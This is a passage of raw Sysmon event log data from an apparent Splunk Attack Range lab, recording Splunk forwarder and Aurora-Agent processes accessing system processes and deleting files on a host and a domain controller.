Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E576-63C7-2102-00000000B002}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017707Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.377{E5A8D418-E576-63C7-2102-00000000B002}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017706Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:30.216{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CC922227C7F53153EE292AE6269850C,SHA256=E51751420B1A2DB4097493729CB64FD4B97D94D9465120EAAE65C080053ACE0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:30.023{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DC43490B033A4CED64591B72F42A529,SHA256=AA883F678DE34DC9F6CA1459E76B4592AE9A0A45DD4B16A74FD1147935353893,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017736Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.783{E5A8D418-E577-63C7-2202-00000000B002}34323928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017735Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.737{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DF14CD3BF1D728745E10AB3CF7DA0AC,SHA256=F4C447431C30B4C3ACF0A527B48C7C40AF8CC535365D9A5534B4020FADC0702D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.704{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.702{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.453{FE4C2B44-E577-63C7-6D06-00000000AF02}67682676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.438{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0172B22184F55FE3F2D2FE72C0714D0D,SHA256=9FEB5B9C706A8AD36BD4217300E723D218A07D2C1F61B49CC95075C2AB8081F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program 